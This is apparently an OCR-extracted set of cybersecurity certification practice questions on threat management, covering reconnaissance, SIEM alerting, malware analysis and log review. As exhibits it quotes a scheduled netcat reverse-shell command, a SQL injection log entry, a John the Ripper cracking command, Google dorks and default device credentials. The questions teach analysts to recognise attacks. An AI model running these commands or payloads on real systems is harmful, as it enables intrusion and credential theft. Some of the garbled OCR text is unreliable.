Latency and packet loss both increased. 


No significant issues were observed. 


As part of an organization-wide red team exercise, Frank is able to use a known vulner- 

ability to compromise an Apache web server. Once he has gained access, what should his 
next step be if he wants to use the system to pivot to protected systems behind the DMZ 
that the web server resides in? 


A. 
B. 
C. 
D. 


Vulnerability scanning 
Privilege escalation 
Patching 


Installing additional tools 


As part of her malware analysis process, Caitlyn diagrams the high-level functions and 
processes that the malware uses to accomplish its goals. What is this process known as? 


A. 


B. 
C. 
D 


Static analysis 
Composition 
Dynamic analysis 


Decomposition 
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36. Alex has been asked to assess the likelihood of reconnaissance activities against her orga- 


nization (a small, regional business). Her first assignment is to determine the likelihood of 
port scans against systems in her organization’s DMZ. How should she rate the likelihood 
of this occurring? 


A. Low 
B. Medium 
C. High 


D. There is not enough information for Alex to provide a rating. 


Use the following scenario for the questions 37 through 39. 


Lucy is the SOC operator for her organization and is responsible for monitoring her 
organization’s SIEM and other security devices. Her organization has both domestic and inter- 
national sites, and many of their employees travel frequently. 


37. 


38. 


39. 


While Lucy is monitoring the SIEM, she notices that all of the log sources from her orga- 
nization’s New York branch have stopped reporting for the past 24 hours. What type of 
detection rules or alerts should she configure to make sure she is aware of this sooner 
next time? 


A. Heuristic 


B. Behavior 
C. Availability 
D. Anomaly 


After her discovery in the first part of this question, Lucy is tasked with configuring alerts 
that are sent to system administrators. She builds a rule that can be represented in pseudo- 
code as follows: 


Send a SMS alert every 30 seconds when systems do not send logs for more than 1 minute. 
The average administrator at Lucy’s organization is responsible for 150 to 300 machines. 


What danger does Lucy’s alert create? 

A. A DDoS that causes administrators to not be able to access systems 

B. A network outage 

C. Administrators may ignore or filter the alerts. 

D. A memory spike 

Lucy configures an alert that detects when users who do not typically travel log in from 
other countries. What type of analysis is this? 

A. Trend 

B. Availability 

C. Heuristic 
D 


Behavior 
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40. During his analysis of a malware sample, John reviews the malware files and binaries 
without running them. What type of analysis is this? 


41. 


42. 


A. 
B. 
C. 
D. 


Automated analysis 
Dynamic analysis 
Static analysis 


Heuristic analysis 


The company that Lauren works for is making significant investments in infrastructure- 
as-a-service hosting to replace its traditional data center. Members of her organization’s 
management have expressed concerns about data remanence when Lauren’s team moves 
from one virtual host to another in their cloud service provider’s environment. What 
should she instruct her team to do to avoid this concern? 


A. 
B. 
C. 
D. 


Zero-wipe drives before moving systems. 
Use full-disk encryption. 
Use data masking. 


Span multiple virtual disks to fragment data. 


Lucca wants to prevent workstations on his network from attacking each other. If Lucca’s 
corporate network looks like the network shown here, what technology should he select to 
prevent laptop A from being able to attack workstation B? 
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— a 


Border Router 





Firewall 
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43. Geoff wants to stop all traffic from reaching or leaving a Linux system with an iptables 
firewall. Which of the following commands is not one of the three iptables commands 
needed to perform this action? 


A. #iptables-policy INPUT DROP 

B. #iptables-policy SERVICE DROP 
C. #iptables-policy OUTPUT DROP 
D. #iptables-policy FORWARD DROP 


44. The company that Dan works for has recently migrated to a SaaS provider for its enter- 
prise resource planning (ERP) software. In its traditional on-site ERP environment, Dan 
conducted regular port scans to help with security validation for the systems. What will 
Dan most likely have to do in this new environment? 


A. Use a different scanning tool. 
B. Rely on vendor testing and audits. 
C. Engage a third-party tester. 


D. Use a VPN to scan inside the vendor’s security perimeter. 


45. Charles uses Network Miner to review packet captures from his reconnaissance of a target 
organization. One system displayed the information shown here. What information has 
Network Miner used to determine that the PC is a Hewlett-Packard device? 


©) MY 192.168.137.85 [Leonardo-PC] (Windows) 
| ie IP: 192.168.137.85 
W MAC: 80C16EGA0BF2 
~~ NIC Vendor: Hewlett Packard 
Hostname: Leonardo-PC 
A OS: Windows 
ff TTL: 128 (distance: 0) 
bf Open TCP Ports: 
E- Sent: 34184 packets (1.819.097 Bytes). 0.00 % cleartext (0 of 0 Bytes) 
: Œ- Received: 39571 packets (52,922,088 Bytes), 0.00 % cleartext (0 of 0 Bytes) 
| i. Incoming sessions: 0 
: H-A Outgoing sessions: 675 
_ E-O Host Details 


The MAC address 
The OS flags 


The system’s banner 


The IP address 
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46. Laura’s organization has been receiving a large amount of spam email sent specifically to 
the email addresses listed in her organization’s domain registrations. Which of the follow- 
ing techniques will help her organization limit this type of spam? 


A. DNS query rate limiting 
B. CAPTCHAs 

C. Using a proxy service 

D. Blacklisting 


47. 


48. 


49. 


50. 


51. 
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Eric believes that his organization has a number of vulnerable systems that have been 
scanned by third parties. If he wants to check publicly available vulnerability information, 
which of the following methods are best suited to performing this type of passive 
reconnaissance? 


A. Use the worldwide nmap database. 

B. Search for his domain in Shodan. 

C. Use the OpenVAS central vulnerability data repository. 
D. Check against the CVE database for his domain. 


Adam knows that netcat is a useful penetration testing tool. Which of the following is 
not a way that he can use netcat, if he is using it as his only tool? 


A. File transfer 
B. Port scanner 
C. Encrypted shell 
D. Reverse shell 


Which of the following tools can be used to passively gather the information required to 
generate a network topology map? 


A. Wireshark 


B. nmap 
C. SolarWinds Network Mapper 
D. Nessus 


Lauren wants to use an advanced Google query to search for information that is not read- 
ily available as part of her reconnaissance efforts. What term is commonly used to describe 
these searches? 


A. Google whacks 

B. SuperGoogles 

C. Google dorks 

D. Google gizmos 

What type of control review will focus on change management as a major element in its 
assessment scope? 

A. Operational control review 

B. Technical control review 

C. Detective control review 
D. 


Responsive control review 
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52. As part of her reconnaissance process for her organization’s internal security review, 
Olivia uses Shodan to search for hosts within her target’s IP range. She discovers the fol- 
lowing Shodan entry listing for one of her target’s devices. What should she do with this 
information? 


53. 


54. 


55. 


Ow > 


D. 


23 c 





telnet Cisco Configuration Professional (Cisco CP) is installed on this device. 
This feature requires the one-time use of the username "cisco" with the 
password "cisco". These default credentials have a privilege level of 15. 


Activate the incident response process. 
Contact the device administrator. 
Log in to validate the finding. 


Nothing, because this is a false positive. 


Kathleen wants to verify on a regular basis that a file has not changed on the system that 
she is responsible for. Which of the following methods is best suited to this? 


A. 
B. 
C. 
D. 


Use shalsum to generate a hash for the file and write a script to check it periodically. 
Install and use Tripwire. 

Periodically check the MAC information for the file using a script. 

Encrypt the file and keep the key secret so the file cannot be modified. 


Selah has been tasked with gathering information to increase her penetration testing 
team’s understanding of their customer’s Internet footprint. She wants to gather details of 
emails, subdomains, employee names, and other information in an automated way. Which 
of the following tools is best suited to her needs? 


A. 
B. 
C. 
D. 


nmap 
theHarvester 


Shodan 


osint-ng 


While reviewing the Wireshark packet capture shown here, Ryan notes an extended ses- 
sion using the ESP protocol. When he clicks the packets, he is unable to make sense of 
the content. What should Ryan look for on the workstation with IP address 10.0.0.1 if he 
investigates it in person? 


4 


o 


dit 


{ 


EO | 


lyze 


A|Apply a display filter ... <Ctrl-/> 


apture Analyze Statistics 
MIRKES F 
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Wir 
/ Wireless 


aaa 








No. 


| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
| 
l 


Time 


Source 


1 0.000000 

3 0.999882 

5 2.000881 

7 3.001832 

10 4.002819 

12 5.003788 

16 6.003755 

18 7.004168 
20 8.008611 
22 9.008647 
24 10.010634 
28 11.011898 
30 12.012538 
32 13.012513 
34 14.013527 
36 15.013464 


10.0: 
10.0. 


VTQVDO 09000 ODO 


PRPPPPRPPPPPPPP PPP PR 


= e e 


e e 


PRR PR 
QVNOODOaDAIWUVAAYVAVAYVDIYVNOAO SO OD 


H 


Protocol 


ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 
ESP 


Length Info 


198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 
198 ESP 


(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 
(SPI=0x0000000a) 





v Internet Protocol Version 





= Version: 4 
... 0101 = Header Length: 20 bytes (5) 
> Differentiated Services Field: @x@@ (DSCP: CS@, ECN: Not-ECT) 


Total Length: 72 


Identification: @x@000 (0) 
Flags: @x@2 (Don't Fragment) 


Fragment offset: @ 


Time to live: 255 
Protocol: UDP (17) 


D © © © © © © © © © © © © O © © O 


sone. 10.0°0-15 Dstt: 224-0°0-251 


Header checksum: @x9@a8 [validation disabled] 
[Header checksum status: Unverified] 


Source: 


10.0.0.1 


Destination: 


224.0.0.251 


[Source GeoIP: Unknown] 


SS MarsltS nnnt Namas an Mama Crrntam 
0000 
0010 
0020 
0030 
0040 
9050 


56. 


99 D> 


[Destination GeoIP: Unknown] 
>» User Datagram Protocol, Src Port: 5353, Dst Port: 5353 


l msia a\ 





01 00 Se 00 
00 48 00 00 
00 fb 14 e9 
00 00 00 01 

00 00 ff 
00 04 Oa 00 


00 fb 00 
40 00 ff 
14 e9 00 
00 00 04 
80 01 c® 
00 01 


Ge 
11 
34 
78 
ðc 


An encrypted RAT 
A VPN application 


A secure web browser 








a6 Od 9d 5b 08 00 45 00 
90 a8 Ga BO BO 01 eB BO 
8b f9 00 00 00 00 BO 01 
69 69 69 @5 6c 6f 63 61 
00 01 00 01 00 00 00 FA 


A base64-encoded packet transfer utility 
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Ben wants to quickly check a suspect binary file for signs of its purpose or other informa- 


tion that it may contain. What Linux tool can quickly show him potentially useful infor- 


mation contained in the file? 


A. 


B. 
C. 
D 


grep 
more 
less 


strings 
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57. While investigating a malware infection, Lauren discovers that the hosts file for the system 
she is reviewing contains multiple entries, as shown here: 


0.0.0.0 symantec.com 
0.0.0.0 mcafee.com 
0.0.0.0 microsoft.com 
0.0.0.0 kapersky.com 


Why would the malware make this change? 
A. To redirect 0.0.0.0 to known sites 
B. To prevent antivirus updates 
C. To prevent other attackers from compromising the system 
D. To enable remote access to the system 
58. Alice believes that one of her users may be taking malicious action on the systems she has 


access to. When she walks past her user’s desktop, she sees the following command on the 
screen: 


user1l2@workstation: /home/user12# ./john -wordfile: /home/user12/mylist.txt 
-format: lm hash.txt 

What is the user attempting to do? 

A. They are attempting to hash a file. 

B. They are attempting to crack hashed passwords. 

C. They are attempting to crack encrypted passwords. 

D. They are attempting a pass-the-hash attack. 


59. nmap provides a standardized way to name hardware and software that it detects. What is 


this called? 

A. CVE 

B. HardwareEnum 
C. CPE 


D. GearScript 


60. Charles wants to detect port scans using syslog so that he can collect and report on the 
information using his SIEM. If he is using a default CentOS system, what should he do? 
A. Search for use of privileged ports in sequential order. 


B. Search for connections to ports in the /var/syslog directory. 


www.allitebooks.com 


61. 


62. 


C. Log all kernel messages to detect scans. 
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D. Install additional tools that can detect scans and send the logs to syslog. 


Alex wants to list all of the NetBIOS sessions open on a workstation. What command 
should he issue to do this? 


A. nbtstat -o 
B. nbtstat -r 
C. nbtstat -s 
D. nbtstat -c 


Lucas believes that an attacker has successfully compromised his web server. Using the fol- 
lowing output of ps, identify the process ID he should focus on. 


root 507 0.0 0. 


message+ 508 0.0 0. 


root 523 0.0 0. 
root 524 0.0 0. 
root 527 0.0 0. 
apache 714 0.0 0. 
root 617 0.0 0. 
root 644 0.0 0. 
root 653 0.0 ©, 
root 661 0.0 ©; 
root 663 0.0 ©, 
root 846 0.0 0. 
root 8&7 0.0 ©. 


Debian-+ 877 0.0 0. 


Debian-+ 878 0.0 0. 


A. 508 
B. 617 
C. 846 
D. 714 


m. 


N 


m 


w 


uo 


Ww 


2 


0 


258268 


44176 


281092 


389760 


28432 


27416 


19312 


245472 


12828 


285428 


364752 


285816 


235180 


46892 


62672 


3288 


5160 


6312 


15956 


2992 


2748 


2056 


2444 


1848 


8088 


7600 


10884 


7272 


4816 


1596 


Ssl 15:52 


Ss 


Ssl 


Ss 


E9; 


is 


i. 


I5: 


15; 


15: 


15: 


15: 


15: 


15; 


15: 


15: 


I5: 


15: 


52 


0:00 /usr/sbin/rsyslogd -n 


0:00 /usr/bin/dbus-daemon --system --address=systemd: 


--nofork --nopidfile --systemd-activa 


0: 


0: 


00 


00 


> 00 


200 


200 


201 


200 


200 


200 


200 


200 


:00 


:00 


/usr/lib/accountsservice/accounts-daemon 
/usr/sbin/NetworkManager --no-daemon 
/lib/systemd/systemd-logind 

/www/temp/webmin 

/usr/sbin/irqbalance --pid=/var/run/irqbalance.pid 
/usr/sbin/VBoxService 

/sbin/agetty --noclear ttyl linux 
/usr/lib/policykit-1/polkitd --no-debug 
/usr/sbin/gdm3 

/usr/lib/upower/upowerd 

gdm-session-worker [pam/gdm-launch-environment] 
/lib/systemd/systemd --user 


(sd-pam) 
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63. While reviewing the filesystem of a potentially compromised system, Angela sees the fol- 


64. 


65. 


66. 


lowing output when running ls -la. What should her next action be after seeing this? 


rwxr-xr-x 1 root root 57 Mar 1 2013 paros 
rwxr-xr-x 1 root root 22256 May 13 2015 parse-edid 
rwxr-xr-x 1 root root 77248 Nov 2 2015 partx 

Lrwxrwxrwx 1 root root 15 Jan 28 2016 passmass -> expect_passmass 
rwsr-xr-x 1 root root 50000 Aug 5 18:23 
rwxr-xr-x 1 root root 31240 Jan 18 2016 paste 
rwxr-xr-x 1 root root 67 May 16 2013 paster 
rwxr-xr-x 1 root root 70 May 16 2013 paster2.7 
rwxr-xr-x 1 root root 14792 Nov 6 2015 pasuspender 
rwxr-xr-x 1 root root 128629 Jan 28 2016 patator 
rwxr-xr-x 1 root root 151272 Mar 7 2015 patch 

Lrwxrwxrwx 1 root root 3 Jan 28 2016 patchwork -> dot 
rwxr-xr-x 1 root root 31032 Dec 12 2015 patgen 
rwxr-xr-x 1 root root 31240 Jan 18 2016 pathchk 
rwxr-xr-x 1 root root 14648 Nov 6 2015 paxllpublish 


Continue to search for other changes. 


Run diff against the password file. 


Oo wo > 


Immediately change her password. 

D. Check the passwd binary against a known good version. 

Michelle has been experiencing SYN floods and deploys a mitigation technique that allows 
the server to respond as if SYNs were accepted but then delete the SYN entry in its queue. 


If the client then responds with a SYN-ACK, the server reconstructs the SYN entry and 
continues the connection. What technique is Michelle using? 


A. SYN cookies 
B. ACK-ACK 

C. TCP frogging 
D. SYN replay 


What two phases of the NIST penetration testing cycle are often repeated during a test? 
A. Planning and discovery 

B. Discovery and attack 

C. Planning and attack 

D. Discovery and reporting 

Geoff is responsible for hardening systems on his network and discovers that a number of 


network appliances have exposed services including telnet, FTP, and web servers. What is 
his best option to secure these systems? 


A. Enable host firewalls. 

B. Install patches for those services. 

C. Turn off the services for each appliance. 
D 


Place a network firewall between the devices and the rest of the network. 


67. 


68. 


69. 


70. 


71. 
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Lauren is performing passive intelligence gathering and discovers a directory filled with 
photos taken by her target organization’s staff. If she wants to review the metadata from 
the photos, what tool can she use to do so? 


A. Strings 

B. Exiftool 

C. Wireshark 

D. Stegdetect 

Lauren’s network firewall denies all inbound traffic but allows all outbound traffic. 


While investigating a Windows workstation, she encounters a script that runs the follow- 
ing command: 


at \\workstation10 20:30 every:F nc -nv 10.1.2.3 443 -e cmd.exe 


What does it do? 

A. It opens a reverse shell for host 10.1.2.3 using netcat every Friday at 8:30. 

B. It uses the AT command to dial a remote host via NetBIOS. 

C. It creates an HTTPS session to 10.1.2.3 every Friday at 8:30. 

D. It creates a VPN connection to 10.1.2.3 every five days at 8:30 GST. 

While conducting reconnaissance of his own organization, Chris discovers that multiple 
certificates are self-signed. What issue should he report to his management? 

A. Self-signed certificates do not provide secure encryption for site visitors. 

B. Self-signed certificates can be revoked only by the original creator. 


C. Self-signed certificates will cause warnings or error messages. 
D. None of the above 


Isaac has access to a Windows system that is a member of the local Active Directory 
domain as part of his white-box penetration test. Which of the following commands might 
provide information about other systems on the network? 


A. net use 

B. net user 

C. net group 

D. net config 

During the reconnaissance stage of a penetration test, Fred calls a number of staff at the 
target organization. Using a script he prepared, Fred introduces himself as part of the sup- 


port team for their recently installed software and asks for information about the software 
and its configuration. What is this technique called? 


A. Pretexting 
B. OSINT 

C. A tag-out 
D. Profiling 
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72. Geoff needs to lock down a Windows workstation that has recently been scanned using 
nmap with the results shown here. He knows that the workstation needs to access websites 
and that the system is part of a Windows domain. What ports should he allow through the 
system’s firewall for externally initiated connections? 


root@kali:~# nmap -sS -PO -p 0-65535 192.168.1.14 


Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-25 21:08 EDT 
Nmap scan report for dynamo (192.168.1.14) 

Host is up (0.00023s latency). 

Not shown: 65524 filtered ports 

PORT STATE SERVICE 

80/tcp open http 

135/tcp open msrpc 

139/tcp open netbios-ssn 

445/tcp open microsoft-ds 

902/tcp open iss-realsecure 

912/tcp open apex-mesh 

2869/tcp open icslap 

3389/tcp open ms-wbt-server 

5357/tcp open wsdapi 

7680/tcp open unknown 

22350/tcp open CodeMeter 

49677/tcp open unknown 

MAC Address: BC:5F:F4:7B:4B:7D (ASRock Incorporation) 


Nmap done: 1 IP address (1 host up) scanned in 105.78 seconds 


80, 135, 139, and 445 
80, 445, and 3389 

135, 139, and 445 

No ports should be open. 
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73. Lucca wants to identify systems that may have been compromised and are being used for 
data exfiltration. Which of the following technologies should he put into place to capture 
data that he can analyze using his SIEM to find this behavior? 


A. A firewall 

B. A netflow collector 
C. A honeypot 

D. A BGP monitor 


74. During a white-box penetration test, Luke finds that he is suddenly unable to connect to 
the target network. What has likely happened? 


A. Automated shunning 
B. Network link failure 
C. Back-off algorithms 
D. A BGP route change 


75. Adam’s port scan returns results on six TCP ports: 22, 80, 443, 515, 631, and 9100. 
If Adam needs to guess what type of device this is based on these ports, what is his 
best guess? 


A. A web server 
B. An FTP server 


C. 
D. 
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A printer 


A proxy server 


76. Cassandra believes that attackers were able to extract a volume shadow copy of a worksta- 
tion belonging to her organization’s Windows domain administrator. What information 
should she not report as being potentially exposed? 


77. 


A. 
B. 
C. 
D. 


All files on the user’s desktop 
Password hashes 
Domain details 


Plain-text Windows account passwords 


Lauren is contacted by a concerned administrator who notes that almost all of their 
Windows 10 Enterprise workstations are reporting the following issue after a patch 
deployment. What important policy may be missing? 


Items marked with 3 are confirmed missing. Items marked with *« are confirmed missing and are not approved by your system administrator. 


Score ID Description : 
Severity 
x 4034658 2017-08 Cumulative Update for Windows 10 Version 1607 for x64-based Systems (KB4034658 Critical 


oO DO > 


D. 


ET MRE V AER COREIA Se Ce ae ee ee ee ae ey E O ae 
aliation of this software update was not complete Wu must restart your computer to sn me 


ae P'S UU., IU WoL CSG FU a vu 


nctallahoan 
Slane UOI I. 


Active hours 
Required reboots 
Automatic updates 


Network time synchronization 


78. Jarett needs to protect an application server against resource exhaustion attacks. Which of 
the following techniques is best suited to surviving a large-scale DDoS attack? 


79. 


A. 
B. 
C. 
D. 


Enable application sharding. 

Review each query and implement query optimization. 
Implement aggressive aging at the organization’s firewall. 
Employ a CDN. 


In his role as the SOC operator, Frank regularly scans a variety of servers in his organi- 
zation. After two months of reporting multiple vulnerabilities on a Windows file server, 
Frank recently escalated the issue to the server administrator’s manager. 


At the next weekly scan window, Frank noticed that all of the vulnerabilities were no 
longer active; however, ports 137, 139, and 445 were still showing as open. What most 
likely happened? 


A. 


B. 
C. 
D 


The server administrator blocked the scanner with a firewall. 
The server was patched. 
The vulnerability plug-ins were updated and no longer report false positives. 


The system was offline. 
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80. While conducting reconnaissance, Greg discovers what he believes is an SMTP service 
running on an alternate port. What technique should he use to manually validate his 
guess? 


A. Send an email via the open port. 
B. Send an SMTP probe. 

C. telnet to the port. 

D. ssh to the port. 


81. Adam is reviewing his organization’s security footprint by conducting reconnaissance 
activities. After reviewing a list of Google dorks, he runs the following search: 


"mysqli_connect" ext: inc 


If it returns data, what should he recommend in his report to management? 
A. Block MySQL connections from remote hosts. 

B. Initiate the organization’s incident response process. 

C. Immediately change MySQL passwords and review configurations. 

D. Change all MySQL connection strings. 


82. Rick’s manager wants to present the most trustworthy certificate possible for a website. 
What type of certificate should Rick get? 


A. EV 
B. DV 
Cc. OV 
D. IV 


83. While reviewing web server logs, Danielle notices the following entry. What occurred? 


10.11.210.6 - GET /wordpress/wp-admin/theme-editor.php?file=404. php&theme= 
total 200 


A. A theme was changed. 

B. A file was not found. 

C. There was an attempt to edit the 404 page. 
D. The 404 page was displayed. 


84. While reviewing his Apache logs, Charles discovers the following entry. What has 
occurred? 


LO.deled = = [27/dun/ 2017211342322 =0500]. “GET 


/query.php?searchterm=stuf F&%20 Lid=1%20UNION%20SELECT%200 , username, user 
id,password, 


85. 


86. 


87. 


88. 
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name ,%20email,%20FROM%20users HTTP/1.1" 200 9918 "-" "Mozilla/4.0 
(compatible; MSIE 


6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" 


A. A successful database query 
B. A PHP overflow attack 
C. A SQL injection attack 


D. An unsuccessful database query 


What two pieces of information does nmap need to estimate network path distance? 

A. IP address and TTL 

B. TTL and operating system 

C. Operating system and BGP flags 

D. TCP flags and IP address 

Charles needs to make sure he has found the correct social media profile for a target of 


his OSINT process. Which of the following includes the three critical items needed to 
uniquely identify the majority of Americans? 


A. Height, weight, and eye color 

B. Date of birth, gender, and zip code 
C. Zodiac sign, gender, and zip code 
D. Age, height, and weight 


While reviewing logs from users with root privileges on an administrative jump box, Alex 
discovers the following suspicious command: 


nc -l -p 43501 < example.zip 


What happened? 

A. The user set up a reverse shell running as example. zip. 

B. The user set up netcat as a listener to push example. zip. 

C. The user set up a remote shell running as example. zip. 

D. The user set up netcat to receive example. zip. 

During an on-site penetration test of a small business, Bob scans outward to a known host 


to determine the outbound network topology. What information can he gather from the 
results provided by Zenmap? 
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Zenmap 


Scan Tools Profile Help 








Target: | scanme.nmap.org v__ Profile: v | |Scan| 


Command: {nmap -sP -PE -PS22,25,80,3389 -PU -PO -traceroute scanme.nmap.org 


[ Hosts | Services Nmap Output Ports / Hosts Topology Host Details Scans 


Os Host Hosts Viewer Fisheye | Controls | Legend | Save Graphic 


uy scanme.nmap 





scanme.nmap.org (45.33.32.156) 


linode-ic-320384-sjo-b21.c.telia.net 
sjo-b21-link.telia.net 
kanc-b1-link.telia.net 
chi-b21-link.telia.net 
be-10563-pe01.350ecermak.il.ibone.comcast.net 
be-33491-cr02.350ecermak.il.ibone.comcast.net 
68.85.176.157 
ge-1-42-ur02.nchicago.il.chicago.comcast.net 
96.120.24.121 


router.asus.com 


localhost 





There are two nodes on the local network. 
There is a firewall at IP address 96.120.24.121. 
There is an IDS at IP address 96.120.24.121. 
He should scan the 10.0.2.0/24 network. 
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89. Chris discovers the following entries in /var/log/auth. log. What is most likely 
occurring? 


Aug 6 14:13:00 demo sshd[5279]: Failed password for root from 10.11.34.11 
port 38460 ssh2 


Aug 6 14:13:00 demo sshd[5275]: Failed password for root from 10.11.34.11 
port 38452 ssh2 


Aug 6 14:13:00 demo sshd[5284]: Failed password for root from 10.11.34.11 
port 38474 ssh2 


Aug 6 14:13:00 demo sshd[5272]: Failed password for root from 10.11.34.11 
port 38446 ssh2 


Aug 6 14:13:00 demo sshd[5276]: Failed password for root from 10.11.34.11 
port 38454 ssh2 


Aug 6 14:13:00 demo sshd[5273]: Failed password for root from 10.11.34.11 
port 38448 ssh2 


Aug 6 14:13:00 demo sshd[5271]: Failed password for root from 10.11.34.11 
port 38444 ssh2 


Aug 6 14:13:00 demo sshd[5280]: Failed password for root from 10.11.34.11 
port 38463 ssh2 


90. 


91. 


92. 


Chapter 1 = Domain 1: Threat Management 27 


Aug 6 14:13:01 demo sshd[5302]: Failed password for root from 10.11.34.11 
port 38478 ssh2 


Aug 6 14:13:01 demo sshd[5301]: Failed password for root from 10.11.34.11 
port 38476 ssh2 


A. A user has forgotten their password. 
B. A brute-force attack against the root account 
C. A misconfigured service 


D. A denial-of-service attack against the root account 
As part of his reconnaissance effort, Charles uses the following Google search string: 
"authentication failure; logname=" ext: log;site:exampLle.com 


What will he find if he receives results from his target’s domain? 
A. A list of successful logins 

B. A list of log names 

C. A list of failed logins 

D. A list of log files 


While reviewing email logs for his domain’s email server, Rick notices that a single remote 
host is sending email to usernames that appear to be in alphabetical order: 


aaron@domain.com 
abbott@domain.com 
abel@domain.com 
abigai Ledomain.com 
ada@domain.com 


adam@domain.com 


This behavior continues for thousands of entries, resulting in many bounced email mes- 
sages, but some make it through. What type of reconnaissance has Rick encountered? 


A. Brute force 

B. Domain harvesting 
C. Domain probe 

D. Email list builder 


Which of the following capabilities is not a typical part of an SIEM system? 
A. Alerting 

B. Performance management 

C. Data aggregation 
D 


Log retention 
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93. What major issue would Charles face if he relied on hashing malware packages to identify 
malware packages? 


A. Hashing can be spoofed. 
B. Collisions can result in false positives. 
C. Hashing cannot identify unknown malware. 


D. Hashing relies on unencrypted malware samples. 


Use the following network diagram and scenario to answer the next three questions: 


Location A 


ga Em Location D 





— myi 
SS 
TE 


Data Center 
Network 


E. =a L 
E- T 


ocation B 
Location C 


Lauren is a security analyst who has been tasked with performing nmap scans of her organiza- 
tion’s network. She is a new hire and has been given this logical diagram of the organization’s 
network but has not been provided with any additional detail. 


94. Lauren wants to determine what IP addresses to scan from location A. How can she find 
this information? 


A. Scan the organization’s web server and then scan the other 255 IP addresses in its 
subnet. 


B. Query DNS to find her organization’s registered hosts. 


O 


Contact ICANN to request the data. 


D. Use traceroute to identify the network that the organization’s domain resides in. 


95. 


96. 


97. 
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If Lauren runs a scan from location B that targets the servers on the data center network 
and then runs a scan from location C, what differences is she most likely to see between 
the scans? 


A. The scans will match. 

B. Scans from location C will show no open ports. 

C. Scans from location C will show fewer open ports. 

D. Scans from location C will show more open ports. 

Lauren wants to perform regular scans of the entire organizational network but only has 


a budget that supports buying hardware for a single scanner. Where should she place her 
scanner to have the most visibility and impact? 


A. Location A 
B. Location B 
C. Location C 
D. Location D 
Andrea needs to add a firewall rule that will prevent external attackers from conducting 


topology gathering reconnaissance on her network. Where should she add a rule intended 
to block this type of traffic? 


Coes! > aw B — Router 
A - Firewall | 


pa C - Layer 3 Distribution Switch 








Er 
> D - Windows 2012 Server 


The firewall 

The router 

The distribution switch 
The Windows 2012 server 
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30 


98. 


99. 


100. 


101. 
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Alex has been asked to investigate a call to one of his organization’s system administrators 
that is believed to have led to a breach. The administrator described that call by saying that the 
caller identified themselves as the assistant to the director of sales and said that they needed 
access to a file that was critical to a sales presentation with a major client but that their lap- 
top had died. The administrator provided a link to the file, which included the organization’s 
sales data for the quarter. What type of social engineering occurred? 


A. Baiting 

B. Quid pro quo 
C. Pretexting 

D. Whaling 


Which of the three key objectives of cybersecurity is often ensured by using techniques like 
hashing and the use of tools like Tripwire? 


A. Confidentiality 
B. Integrity 

C. Identification 
D. Availability 


The netflow collector that Sam’s security team uses is capable of handling 1 gigabit of 
traffic per second. As Sam’s organization has grown, it has increased its external network 
connection to a 2 gigabit per second external link and has begun to approach full utiliza- 
tion at various times during the day. If Sam’s team does not have new budget money to 
purchase a more capable collector, what option can Sam use to still collect useful data? 


A. Enable QoS 

B. Enable netflow compression 
C. Enable sampling 

D. None of the above 


Senior C-level executives at the organization that Alex works for have received targeted 
phishing messages that include a fake organizational login page link and a message that 
states that their passwords were inadvertently reset during a scheduled maintenance win- 
dow. What type of attack should Alex describe in his after action report? 


A. Tuna phishing 
B. Whaling 

C. Spear phishing 
D. SAML phishing 
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102. Brandon wants to perform a WHOIS query for a system he believes is located in Europe. 
Which NIC should he select to have the greatest likelihood of success for his query? 


A. AFRINIC 
B. APNIC 

C. RIPE 

D. LACNIC 


103. Chris wants to determine what TCP ports are listening on a Windows system. What is his 
best option to determine this from the command line? 


A. Use arp -a. 
B. Usenetstat -lt. 
C. Usenmap -t 127.0.0.1. 
D. There is not a Windows command do to this. 
104. As part of her system hardening process for a Windows 10 workstation, Lauren runs the 


Microsoft Baseline System Analyzer. She sees the following result after MBSA runs. What 
can she determine from this scan? 


Microsoft 


Baseline Security Analyzer 


2 share(s) are present on your computer. 
Result Details 
Access: F - Full, R - Read, W - Write, D - Delete, X - Execute, C - Change 


NT SERVICE\TrustedInstaller - F, NT AUTHORITY \SYSTEM - RWXD, 

BUILTIN Administrators - RWXD, BUILTIN\Users - RX, APPLICATION PACKAGE 
AUTHORITY \ALL APPLICATION PACKAGES - RX, APPLICATION PACKAGE 
AUTHORITY \ALL RESTRICTED APPLICATION PACKAGES -RX 


BUILTIN Administrators - F, NT AUTHORITY\SYSTEM - F, BUILTIN\WUsers - RX, NT 
AUTHORITY \Authenticated Users - D 





A. The system has been compromised, and shares allow all users to read and execute 
administrative files. 


B. The system has default administrative shares enabled. 


© 


The system is part of a domain that uses administrative shares to manage systems. 


D. The shares are properly secured and pose no threat to the system. 
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105. While Greg was performing a port scan of a critical server system, the system administra- 
tors at his company observed the behavior shown here in their network management soft- 
ware suite. What action should Greg take after he is shown this chart? 


Min/Max/Average Response Time & Packet Loss EXPORT HELP 


AMI (AW S) 
Apr 21 2017, 12:30 pm- Apr 22 2017, 12:30 pm 


Zoom th 12h 24h 


NOS 


ow 


RESPONSE TIME IN MILLISECO 


1500 ms 


1000 ms 


L3¥ ONG X 


500 ms 





6:00 PM 22 Apr 6:00 AM 12:00 PM 





v GB Average Response Time AMI (AWS) 
A” GB Percentile 95% 

A E Min/Max Response Time AMI (AWS) 
7 GB % Packet Loss AMI (AWS) 


solarwinds å 


Increase the number of concurrent scans. 
Decrease the number of ports scanned. 


Decrease the number of concurrent scans. 
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Increase the number of ports scanned. 
106. An access control system that relies on the operating system to constrain the ability of a 
subject to perform operations is an example of what type of access control system? 
A. A discretionary access control system 
B. A role-based access control system 
C. A mandatory access control system 
D. A level-based access control system 


107. While reviewing Apache logs, Janet sees the following entries as well as hundreds of others 
